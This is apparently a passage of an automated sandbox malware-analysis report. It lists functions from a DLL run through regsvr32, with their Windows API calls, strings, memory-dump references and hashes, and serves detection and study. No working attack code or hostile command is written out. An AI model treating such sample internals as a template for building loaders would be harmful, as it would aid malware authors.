                                                                  • Opcode Fuzzy Hash: c7e3700f0ef3b4c8b30f6d3f29a1ffa67155c80f1ff3ea40402055d4547b4231
                                                                  • Instruction Fuzzy Hash: 74419DB5A40245ABE720DBA4DC89F7FB7B8EF48710F504619FA52972C0C770A950CBA4
                                                                  Function 6C94CDF0 Relevance: 17.6, APIs: 6, Strings: 4, Instructions: 131filememoryCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Strings
                                                                  • VirtualProtect failed with code 0x%x, xrefs: 6C94CF56
                                                                  • Mingw-w64 runtime failure:, xrefs: 6C94CE18
                                                                  • VirtualQuery failed for %d bytes at address %p, xrefs: 6C94CF87
                                                                  • Address %p has no image-section, xrefs: 6C94CF9B
                                                                  Memory Dump Source
                                                                  • Source File: 00000007.00000002.2918930947.000000006C851000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C850000, based on PE: true
                                                                  • Associated: 00000007.00000002.2918891880.000000006C850000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919021980.000000006C954000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919055650.000000006C955000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919135650.000000006C9CA000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919170123.000000006C9CB000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919206104.000000006C9CC000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919258466.000000006C9CD000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919294205.000000006C9D1000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_7_2_6c850000_regsvr32.jbxd
                                                                  Similarity
                                                                  • API ID: Virtual$ErrorLastProtectQueryabortfwritevfprintf
                                                                  • String ID: VirtualProtect failed with code 0x%x$ VirtualQuery failed for %d bytes at address %p$Address %p has no image-section$Mingw-w64 runtime failure:
                                                                  • API String ID: 1616349570-1534286854
                                                                  • Opcode ID: be0a6309edb185d0e6c65b76495ad6d713a11f9f541b5e72474def670142bc10
                                                                  • Instruction ID: 3e54bdaa26c9dfc6643dce01af5174313a10d40dd0a886c865bfdd8b28efd61e
                                                                  • Opcode Fuzzy Hash: be0a6309edb185d0e6c65b76495ad6d713a11f9f541b5e72474def670142bc10
                                                                  • Instruction Fuzzy Hash: 845157B1A093019FC700EF69D48465AFBF4FB99318F14CA5DE8889B715E734E948CB92
                                                                  Function 6C86ED20 Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 124COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • realloc.MSVCRT ref: 6C86ED44
                                                                  • GetAdaptersAddresses.IPHLPAPI(00000000,0000000E,00000000,00000000,00003C00), ref: 6C86ED61
                                                                  • free.MSVCRT ref: 6C86EDD0
                                                                  • memcpy.MSVCRT(00000000,failed to allocate memory for IP_ADAPTER_ADDRESSESGetAdaptersAddresses() failed with code ,00000032), ref: 6C86EDFC
                                                                  • free.MSVCRT ref: 6C86EE05
                                                                  • free.MSVCRT ref: 6C86EE4A
                                                                  • free.MSVCRT ref: 6C86EE5B
                                                                  Strings
                                                                  • failed to allocate memory for IP_ADAPTER_ADDRESSESGetAdaptersAddresses() failed with code , xrefs: 6C86EDF6
                                                                  • cannot access a Thread Local Storage value during or after destruction/rustc/f6e511eec7342f59a25f7c0534f1dbea00d01b14\library\std\src\thread\local.rs, xrefs: 6C86ED23
                                                                  • Gid, xrefs: 6C86EE88
                                                                  Memory Dump Source
                                                                  • Source File: 00000007.00000002.2918930947.000000006C851000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C850000, based on PE: true
                                                                  • Associated: 00000007.00000002.2918891880.000000006C850000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919021980.000000006C954000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919055650.000000006C955000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919135650.000000006C9CA000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919170123.000000006C9CB000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919206104.000000006C9CC000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919258466.000000006C9CD000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919294205.000000006C9D1000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_7_2_6c850000_regsvr32.jbxd
                                                                  Similarity
                                                                  • API ID: free$AdaptersAddressesmemcpyrealloc
                                                                  • String ID: Gid$cannot access a Thread Local Storage value during or after destruction/rustc/f6e511eec7342f59a25f7c0534f1dbea00d01b14\library\std\src\thread\local.rs$failed to allocate memory for IP_ADAPTER_ADDRESSESGetAdaptersAddresses() failed with code
                                                                  • API String ID: 2404723152-66611615
                                                                  • Opcode ID: b3299872c382ef2a5c14acd4002bb67eeeee34893b879bd829432163f875df32
                                                                  • Instruction ID: c36f48ba8debca24497d83f34731a7fbcbf1c4d33182e7e0b675290d804df896
                                                                  • Opcode Fuzzy Hash: b3299872c382ef2a5c14acd4002bb67eeeee34893b879bd829432163f875df32
                                                                  • Instruction Fuzzy Hash: B94192B1D01208AFDB10DFA4DD41BEEB7F8AF25309F144429E908AB741E771DA08CBA1
                                                                  Function 6C85B650 Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 99registryCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • PdhOpenQueryA.PDH(00000000,00000000,?,?,00000000,00000000), ref: 6C85B66A
                                                                  • PdhAddEnglishCounterA.PDH(00000000,\System\Cpu Queue Length,00000000,00000000,00000000,00000000,?,?,00000000), ref: 6C85B688
                                                                  • PdhCloseQuery.PDH(00000000,00000000,00000005,00000000,00000000,00000000,00000000,LoadUpdateEvent,00000000,\System\Cpu Queue Length,00000000,00000000,00000000,00000000,?), ref: 6C85B694
                                                                  • CreateEventA.KERNEL32(00000000,00000000,00000000,LoadUpdateEvent,00000000,\System\Cpu Queue Length,00000000,00000000,00000000,00000000,?,?,00000000), ref: 6C85B6C0
                                                                  • PdhCollectQueryDataEx.PDH(00000000,00000005,00000000,00000000,00000000,00000000,LoadUpdateEvent,00000000,\System\Cpu Queue Length,00000000,00000000,00000000,00000000,?,?,00000000), ref: 6C85B6D5
                                                                  • RegisterWaitForSingleObject.KERNEL32(00000000,00000000,6C85B4C0,00000000,000000FF,00000000), ref: 6C85B6F7
                                                                  • PdhCloseQuery.PDH(00000000,00000000,00000000,00000000,LoadUpdateEvent,00000000,\System\Cpu Queue Length,00000000,00000000,00000000,00000000), ref: 6C85B73E
                                                                  • PdhRemoveCounter.PDH(00000000,00000000,00000005,00000000,00000000,00000000,00000000,LoadUpdateEvent,00000000,\System\Cpu Queue Length,00000000,00000000,00000000,00000000), ref: 6C85B794
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000007.00000002.2918930947.000000006C851000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C850000, based on PE: true
                                                                  • Associated: 00000007.00000002.2918891880.000000006C850000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919021980.000000006C954000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919055650.000000006C955000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919135650.000000006C9CA000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919170123.000000006C9CB000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919206104.000000006C9CC000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919258466.000000006C9CD000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919294205.000000006C9D1000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_7_2_6c850000_regsvr32.jbxd
                                                                  Similarity
                                                                  • API ID: Query$CloseCounter$CollectCreateDataEnglishEventObjectOpenRegisterRemoveSingleWait
                                                                  • String ID: LoadUpdateEvent$\System\Cpu Queue Length
                                                                  • API String ID: 650704249-2417354242
                                                                  • Opcode ID: 09eea6a5ac2f7035f2bfb0283c7df8f3235a4e86658505b5beecfa19a7233451
                                                                  • Instruction ID: 8ff83bb66654688f80096c32bcc3b6afb038a2f32cd4e197fe9acef4d52851da
                                                                  • Opcode Fuzzy Hash: 09eea6a5ac2f7035f2bfb0283c7df8f3235a4e86658505b5beecfa19a7233451
                                                                  • Instruction Fuzzy Hash: 2431E870C00709AADB20CFA5CD04FEFB7F5BF60308F608929E425A6AD0E7B5D5588B90
                                                                  Function 6C8FA6B0 Relevance: 16.8, APIs: 11, Instructions: 340COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • SetLastError.KERNEL32(00000000), ref: 6C8FA75C
                                                                  • GetFullPathNameW.KERNEL32(?,00000200,?,00000000,00000000), ref: 6C8FA76B
                                                                  • GetLastError.KERNEL32(?,00000000,00000002,00000000,00000000,?,00000200,?,00000000,00000000), ref: 6C8FA776
                                                                  • GetLastError.KERNEL32(?,00000000,00000002,00000000,00000000,?,00000200,?,00000000,00000000), ref: 6C8FA78B
                                                                  • memcmp.MSVCRT(?,950F5D07,950F5CFF,?,00000200,?,00000000,00000000), ref: 6C8FA7F5
                                                                  • memcpy.MSVCRT(00000002,?,950F5CFF,?,00000000,00000000), ref: 6C8FA8C7
                                                                  • GetLastError.KERNEL32(?,00000000,00000002,00000000,00000000,?,00000200,?,00000000,00000000), ref: 6C8FA809
                                                                    • Part of subcall function 6C85AC40: HeapFree.KERNEL32(00000000,0000000C), ref: 6C8E9FA8
                                                                  Memory Dump Source
                                                                  • Source File: 00000007.00000002.2918930947.000000006C851000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C850000, based on PE: true
                                                                  • Associated: 00000007.00000002.2918891880.000000006C850000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919021980.000000006C954000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919055650.000000006C955000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919135650.000000006C9CA000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919170123.000000006C9CB000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919206104.000000006C9CC000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919258466.000000006C9CD000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919294205.000000006C9D1000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_7_2_6c850000_regsvr32.jbxd
                                                                  Similarity
                                                                  • API ID: ErrorLast$FreeFullHeapNamePathmemcmpmemcpy
                                                                  • String ID:
                                                                  • API String ID: 1844123116-0
                                                                  • Opcode ID: c6fe174ad1e67bbe084dbcee0df08d8e00900df60b4cee310d13afc2be05863f
                                                                  • Instruction ID: 1498102ac5e5b208d516f44bfdb73015defbcfff1038e817046dab8f0886f1c9
                                                                  • Opcode Fuzzy Hash: c6fe174ad1e67bbe084dbcee0df08d8e00900df60b4cee310d13afc2be05863f
                                                                  • Instruction Fuzzy Hash: A3C1F875E002199FDB208FA8CE85BEEB7B4EF14768F144825E824B7741E771DD068BA1
                                                                  Function 6C894F10 Relevance: 16.8, APIs: 7, Strings: 4, Instructions: 272COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • memcpy.MSVCRT(?,?,00000404), ref: 6C894F67
                                                                  • memcpy.MSVCRT(?,?,00000404), ref: 6C894FDB
                                                                  • memcpy.MSVCRT(?,?,00000404), ref: 6C895034
                                                                  • memcpy.MSVCRT(?,?,00000404), ref: 6C89506C
                                                                  • memcpy.MSVCRT(?,?,00000404), ref: 6C8950A3
                                                                  • memcpy.MSVCRT(?,?,00000404), ref: 6C8950DE
                                                                  • memcpy.MSVCRT(?,?,00000404), ref: 6C89513E
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000007.00000002.2918930947.000000006C851000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C850000, based on PE: true
                                                                  • Associated: 00000007.00000002.2918891880.000000006C850000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919021980.000000006C954000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919055650.000000006C955000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919135650.000000006C9CA000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919170123.000000006C9CB000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919206104.000000006C9CC000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919258466.000000006C9CD000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919294205.000000006C9D1000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_7_2_6c850000_regsvr32.jbxd
                                                                  Similarity
                                                                  • API ID: memcpy
                                                                  • String ID: -$?$@$}
                                                                  • API String ID: 3510742995-215791323
                                                                  • Opcode ID: 69d477a320ffa04a8f262f88bdf9f5849ddc4ae15b177930c6f9a0e35f142fde
                                                                  • Instruction ID: 51b7926247118aea9416c9b1cdea660e655e8365b1d73c259ad26096d1d90d28
                                                                  • Opcode Fuzzy Hash: 69d477a320ffa04a8f262f88bdf9f5849ddc4ae15b177930c6f9a0e35f142fde
                                                                  • Instruction Fuzzy Hash: 5FA1E1B1D006199FDB21CF58DC80FEA73B8FF81319F048969FA19AB642D3349945CBA5
                                                                  Function 6C86EEA0 Relevance: 16.7, APIs: 11, Instructions: 236COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • TlsGetValue.KERNEL32(?,6C95405C,?,?,?,?,6C87FB50,6C95405C,00000000,?,6C87F9CD,00000000,00000001), ref: 6C86EEB6
                                                                  • TlsGetValue.KERNEL32(00000000,?,?,00000000,6C87F9CD,00000000,00000001,?,?,?,?,?,?,?,00000001), ref: 6C86EF0F
                                                                  • TlsSetValue.KERNEL32(00000000,00000000,00000000,?,?,00000000,6C87F9CD,00000000,00000001,?,?,?,?,?,?,?), ref: 6C86EF1B
                                                                  • TlsGetValue.KERNEL32(00000000,6C87F9CD,00000000,00000001,?,?,?,?,?,?,?,00000001,?,6C86A3E7), ref: 6C86EF71
                                                                  • TlsGetValue.KERNEL32(-00000001), ref: 6C86EFFB
                                                                  • ProcessPrng.BCRYPTPRIMITIVES(?,00000010,-00000001), ref: 6C86F03B
                                                                  • TlsGetValue.KERNEL32(-00000001), ref: 6C86F06F
                                                                  • TlsSetValue.KERNEL32(-00000001,00000000,-00000001), ref: 6C86F07B
                                                                  Memory Dump Source
                                                                  • Source File: 00000007.00000002.2918930947.000000006C851000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C850000, based on PE: true
                                                                  • Associated: 00000007.00000002.2918891880.000000006C850000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919021980.000000006C954000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919055650.000000006C955000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919135650.000000006C9CA000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919170123.000000006C9CB000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919206104.000000006C9CC000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919258466.000000006C9CD000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919294205.000000006C9D1000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_7_2_6c850000_regsvr32.jbxd
                                                                  Similarity
                                                                  • API ID: Value$PrngProcess
                                                                  • String ID:
                                                                  • API String ID: 3259538350-0
                                                                  • Opcode ID: 6584dfd4f9f59c49b5b1645cdddc22489d5f1538ceab16b8ef7d82314bec0370
                                                                  • Instruction ID: 29eb0b69ccedaabe4b5c35e9e1fc07707486cbc80191026487d1fe35b7ea103c
                                                                  • Opcode Fuzzy Hash: 6584dfd4f9f59c49b5b1645cdddc22489d5f1538ceab16b8ef7d82314bec0370
                                                                  • Instruction Fuzzy Hash: 1C718E705012045FE7219B358D40FEA77A8BF6171CF054964F9589BF41EB71E90887E1
                                                                  Function 02634CA0 Relevance: 16.7, APIs: 11, Instructions: 156COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • SetLastError.KERNEL32(0000139F,026491B4,?,?,?), ref: 02634CD6
                                                                  • RtlEnterCriticalSection.NTDLL(?), ref: 02634CFD
                                                                  • SetLastError.KERNEL32(0000139F), ref: 02634D11
                                                                  • RtlLeaveCriticalSection.NTDLL(?), ref: 02634D18
                                                                  Memory Dump Source
                                                                  • Source File: 00000007.00000002.2916891483.0000000002631000.00000020.10000000.00040000.00000000.sdmp, Offset: 02631000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_7_2_2631000_regsvr32.jbxd
                                                                  Similarity
                                                                  • API ID: CriticalErrorLastSection$EnterLeave
                                                                  • String ID:
                                                                  • API String ID: 2124651672-0
                                                                  • Opcode ID: 5e2d3de765047ab82cd7e02a2792e6b01c1d2ce168f33af85dd699b5a50f4bec
                                                                  • Instruction ID: ec45896c3b0682c6b5737855ba1fb1dcc89aac982f4c33202f6d10eb678bac20
                                                                  • Opcode Fuzzy Hash: 5e2d3de765047ab82cd7e02a2792e6b01c1d2ce168f33af85dd699b5a50f4bec
                                                                  • Instruction Fuzzy Hash: 2051AD7AA046409FC715DFA8E984BAEF7F5FB48710F00492EE95A87780DB35B800CB90
                                                                  Function 02633DC0 Relevance: 15.1, APIs: 10, Instructions: 117memorynetworkCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • RtlEnterCriticalSection.NTDLL(?), ref: 02633DE5
                                                                  • RtlLeaveCriticalSection.NTDLL(?), ref: 02633E30
                                                                  • send.WS2_32(02633AE3,?,?,00000000), ref: 02633E4E
                                                                  • RtlEnterCriticalSection.NTDLL(?), ref: 02633E61
                                                                  • RtlLeaveCriticalSection.NTDLL(?), ref: 02633E74
                                                                  • HeapFree.KERNEL32(00000000,00000000,?,?,02633AE3), ref: 02633E9C
                                                                  • WSAGetLastError.WS2_32(?,02633AE3), ref: 02633EA7
                                                                  • RtlEnterCriticalSection.NTDLL(?), ref: 02633EBB
                                                                  • RtlLeaveCriticalSection.NTDLL(?), ref: 02633EF4
                                                                  • HeapFree.KERNEL32(00000000,00000000,?,?,02633AE3), ref: 02633F31
                                                                  Memory Dump Source
                                                                  • Source File: 00000007.00000002.2916891483.0000000002631000.00000020.10000000.00040000.00000000.sdmp, Offset: 02631000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_7_2_2631000_regsvr32.jbxd
                                                                  Similarity
                                                                  • API ID: CriticalSection$EnterLeave$FreeHeap$ErrorLastsend
                                                                  • String ID:
                                                                  • API String ID: 1701177279-0
                                                                  • Opcode ID: 7b47f9c2ce92a840ad89de0d557cd282db77d0bcf36097981bdd04cae15f031a
                                                                  • Instruction ID: a7cf588814c2fc6aa0a6805adf735f59f61912d6988bfcf98a44c07740059be8
                                                                  • Opcode Fuzzy Hash: 7b47f9c2ce92a840ad89de0d557cd282db77d0bcf36097981bdd04cae15f031a
                                                                  • Instruction Fuzzy Hash: 31410775A046009FC725CF74D988BABB7F8BB49704F4489AEE95ECB340D771A8518FA0
                                                                  Function 02634F20 Relevance: 15.1, APIs: 10, Instructions: 114timenetworkCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • WSASetLastError.WS2_32(0000000D,00000000,?), ref: 02634F53
                                                                  • RtlEnterCriticalSection.NTDLL(?), ref: 02634F68
                                                                  • WSASetLastError.WS2_32(00002746), ref: 02634F7A
                                                                  • RtlLeaveCriticalSection.NTDLL(?), ref: 02634F81
                                                                  • timeGetTime.WINMM ref: 02634FAF
                                                                  • timeGetTime.WINMM ref: 02634FD7
                                                                  • SetEvent.KERNEL32(?), ref: 02635015
                                                                  • InterlockedExchange.KERNEL32(?,00000001), ref: 02635021
                                                                  • RtlLeaveCriticalSection.NTDLL(?), ref: 02635028
                                                                  • RtlLeaveCriticalSection.NTDLL(?), ref: 0263503B
                                                                  Memory Dump Source
                                                                  • Source File: 00000007.00000002.2916891483.0000000002631000.00000020.10000000.00040000.00000000.sdmp, Offset: 02631000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_7_2_2631000_regsvr32.jbxd
                                                                  Similarity
                                                                  • API ID: CriticalSection$Leave$ErrorLastTimetime$EnterEventExchangeInterlocked
                                                                  • String ID:
                                                                  • API String ID: 1979691958-0
                                                                  • Opcode ID: 99c7eab95cbb2d302f0dcd887011cd6cf0fe84aae2903001dbf3047fd651e9d3
                                                                  • Instruction ID: 57049a0aedec281385fb1a4c8c93679a91b332403093cd71e9c024f42117fe51
                                                                  • Opcode Fuzzy Hash: 99c7eab95cbb2d302f0dcd887011cd6cf0fe84aae2903001dbf3047fd651e9d3
                                                                  • Instruction Fuzzy Hash: 4841D035A043009FD7219F29D988B6AF7E5BF88714F444A59E88AC7740E732E8858B80
                                                                  Function 6C945D90 Relevance: 15.1, APIs: 10, Instructions: 98COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • abort.MSVCRT(?,?,00000008,?,?,00000000,6C9460A4), ref: 6C94D94C
                                                                  • abort.MSVCRT(?,?,00000008,?,?,00000000,6C9460A4), ref: 6C94D951
                                                                  • abort.MSVCRT(?,?,00000008,?,?,00000000,6C9460A4), ref: 6C94D956
                                                                  • abort.MSVCRT(?,?,00000008,?,?,00000000,6C9460A4), ref: 6C94D95B
                                                                  • abort.MSVCRT(?,?,00000008,?,?,00000000,6C9460A4), ref: 6C94D960
                                                                  • abort.MSVCRT(?,?,00000008,?,?,00000000,6C9460A4), ref: 6C94D965
                                                                  • abort.MSVCRT(?,?,00000008,?,?,00000000,6C9460A4), ref: 6C94D96A
                                                                  • abort.MSVCRT(?,?,00000008,?,?,00000000,6C9460A4), ref: 6C94D96F
                                                                  • abort.MSVCRT(?,?,6C94832C), ref: 6C94D974
                                                                  • abort.MSVCRT(?,?,6C94832C), ref: 6C94D979
                                                                  Memory Dump Source
                                                                  • Source File: 00000007.00000002.2918930947.000000006C851000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C850000, based on PE: true
                                                                  • Associated: 00000007.00000002.2918891880.000000006C850000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919021980.000000006C954000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919055650.000000006C955000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919135650.000000006C9CA000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919170123.000000006C9CB000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919206104.000000006C9CC000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919258466.000000006C9CD000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919294205.000000006C9D1000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_7_2_6c850000_regsvr32.jbxd
                                                                  Similarity
                                                                  • API ID: abort
                                                                  • String ID:
                                                                  • API String ID: 4206212132-0
                                                                  • Opcode ID: 795ad5ba9f1443d1a207bfee6eec0e68aaea01f56df510d42a3205860efb64d9
                                                                  • Instruction ID: 95cc41ef1583cb4808447f1d72d852c270d62d998e9fc8c0cc9f65a2e814dcb7
                                                                  • Opcode Fuzzy Hash: 795ad5ba9f1443d1a207bfee6eec0e68aaea01f56df510d42a3205860efb64d9
                                                                  • Instruction Fuzzy Hash: 6321D6723092158FD704CF68E891B96B7E6FFC2218F68C27EE5488B755D636E806CB50
                                                                  Function 6C94CFB0 Relevance: 14.2, APIs: 5, Strings: 3, Instructions: 228COMMON
                                                                  Download Yara Rule
                                                                  Strings
                                                                  • Unknown pseudo relocation protocol version %d., xrefs: 6C94D26E
                                                                  • Unknown pseudo relocation bit size %d., xrefs: 6C94D10C
                                                                  • %d bit pseudo relocation at %p out of range, targeting %p, yielding the value %p., xrefs: 6C94D0C0
                                                                  Memory Dump Source
                                                                  • Source File: 00000007.00000002.2918930947.000000006C851000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C850000, based on PE: true
                                                                  • Associated: 00000007.00000002.2918891880.000000006C850000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919021980.000000006C954000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919055650.000000006C955000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919135650.000000006C9CA000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919170123.000000006C9CB000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919206104.000000006C9CC000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919258466.000000006C9CD000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919294205.000000006C9D1000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_7_2_6c850000_regsvr32.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: Unknown pseudo relocation bit size %d.$ Unknown pseudo relocation protocol version %d.$%d bit pseudo relocation at %p out of range, targeting %p, yielding the value %p.
                                                                  • API String ID: 0-1286557213
                                                                  • Opcode ID: d34b5caa073c565f3ba78a561840e388449302476488c2f8e223ec3dba364bd9
                                                                  • Instruction ID: b9a64c4b014a50cd4e06aecf2ae72df2facbaf812dffc253668f5ce05b2f1829
                                                                  • Opcode Fuzzy Hash: d34b5caa073c565f3ba78a561840e388449302476488c2f8e223ec3dba364bd9
                                                                  • Instruction Fuzzy Hash: 7881B177B052158FCF10EFA8C48068AB7B8BF5A318F15C629E958A7B05D730E905CBD2
                                                                  Function 6C8979B0 Relevance: 13.7, APIs: 9, Instructions: 157COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • VariantToPropVariant.PROPSYS(?,?), ref: 6C8979DB
                                                                  • PropVariantClear.OLE32(?), ref: 6C897A35
                                                                  • VariantToPropVariant.PROPSYS(?,?,?), ref: 6C897A44
                                                                    • Part of subcall function 6C89A890: GetErrorInfo.OLEAUT32(00000000,00000000,00000000,?,?,6C8768BC,00000000,?,0000003C,00000000), ref: 6C89A8A5
                                                                  • PropVariantClear.OLE32(?,?,?), ref: 6C897A85
                                                                  • PropVariantCompareEx.PROPSYS(?,?,00000000,00000000,?,?,?), ref: 6C897B4B
                                                                  • PropVariantClear.OLE32(?,?,?,?), ref: 6C897B72
                                                                  • PropVariantClear.OLE32(?,?,?,?,?), ref: 6C897B7C
                                                                  • PropVariantClear.OLE32(?), ref: 6C897BC9
                                                                  Memory Dump Source
                                                                  • Source File: 00000007.00000002.2918930947.000000006C851000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C850000, based on PE: true
                                                                  • Associated: 00000007.00000002.2918891880.000000006C850000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919021980.000000006C954000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919055650.000000006C955000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919135650.000000006C9CA000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919170123.000000006C9CB000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919206104.000000006C9CC000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919258466.000000006C9CD000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919294205.000000006C9D1000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_7_2_6c850000_regsvr32.jbxd
                                                                  Similarity
